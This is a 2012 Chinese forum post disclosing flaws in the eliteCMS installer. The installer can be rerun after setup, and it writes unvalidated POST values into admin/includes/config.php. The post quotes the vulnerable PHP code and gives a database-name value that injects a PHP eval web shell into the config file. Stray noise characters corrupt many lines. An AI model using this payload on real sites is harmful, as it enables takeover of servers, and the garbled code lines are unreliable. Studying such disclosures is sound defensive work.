eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装. q3 @8 p1 m9 _6 @5 V
7 k- Q* s% k; K0 _5 R
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
) b! U6 X0 H& K# `5 @我们来看代码:( t; N5 \5 J% T+ m% n2 T
: h$ G, L6 M# v3 l" C; N% { ]...
% G7 |& {; Z% i) y7 \0 Velseif ($_GET['step'] == "4") {
9 e8 R2 |1 l1 J* G" J. X $file = "../admin/includes/config.php";
8 }2 ^5 M; h6 f* }6 f0 F $write = "<?php\n";/ d" U0 F9 B3 `6 Y/ X
$write .= "/**\n";
9 e- y; S/ o' ^) u0 s5 s; k3 b $write .= "*\n";$ @9 ?, ?; O6 O( O/ |# Q
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
8 \. ~! Y. [" F: f3 J5 G j...略...' @: ?! X( \* m/ b0 g8 V! L f
$write .= "*\n";
$ \6 Y) N: n/ B $write .= "*/\n";
- W9 D: U3 J" ]4 H" ]% C* ~ $write .= "\n";
) X5 z$ j! @9 S- f $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";- R# N8 |* G/ K) d3 z7 z
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";7 X1 T% C1 b6 w1 E, N& T, P
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
) o2 f. h7 z: C# Z $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";1 L6 {* f" p) X) Q
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";3 j6 K, s @; X6 N& S- |) D! {! a
$write .= "if (!\$connection) {\n";+ a) e" p$ b6 s! p
$write .= " die(\"Database connection failed\" .mysql_error());\n";! v% ^* c1 b) b8 K5 H) D
$write .= " \n";4 b. f3 {3 }# x1 M7 k
$write .= "} \n";
! i# D. r# `( Z# a3 i' c9 c $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";3 C; q7 a7 S" `" N$ k
$write .= "if (!\$db_select) {\n";
; h6 u' M* q% H9 K$ T8 ~6 s $write .= " die(\"Database select failed\" .mysql_error());\n";. Q: A+ P/ Q7 B. n0 ~2 Z
$write .= " \n";
' s' X5 i+ I. q3 M- L- n. T $write .= "} \n";* C) ^& l C$ S4 j9 O- s
$write .= "?>\n";
@: ?7 d: u1 c5 w3 [ 3 y0 b7 G; ]. X! Q
$writer = fopen($file, 'w');
$ e% _+ \; c# Z$ R' o...0 d5 O3 f; n6 o8 L
% W9 C0 ~/ R! N' C
在看代码:5 w5 R$ N4 I. H- d0 l
! D6 Y4 X$ t/ G" |! B
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
' U4 t/ A/ M( ?$_SESSION['DB_NAME'] = $_POST['DB_NAME'];1 L9 J x7 U% `
$_SESSION['DB_USER'] = $_POST['DB_USER']; S' o$ x' ^& F
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
" A6 ?. S1 h5 G( B1 p
5 d! l, e" O8 O5 }0 t取值未作任何验证' N4 V! v: q. e# e. @) Q" H8 V- i
如果将数据库名POST数据:2 N/ B/ D( [9 W$ @( @4 M
) m. O$ D2 h' t, u"?><?php eval($_POST[c]);?><?php
& `( a7 F" T# x2 j/ J+ Q* @
0 ?+ z' w! ~8 V9 a! [将导致一句话后门写入/admin/includes/config.php
/ K& J& u7 u. x" u3 E |
发表于 2012-11-18 13:59:27
收藏
支持
反对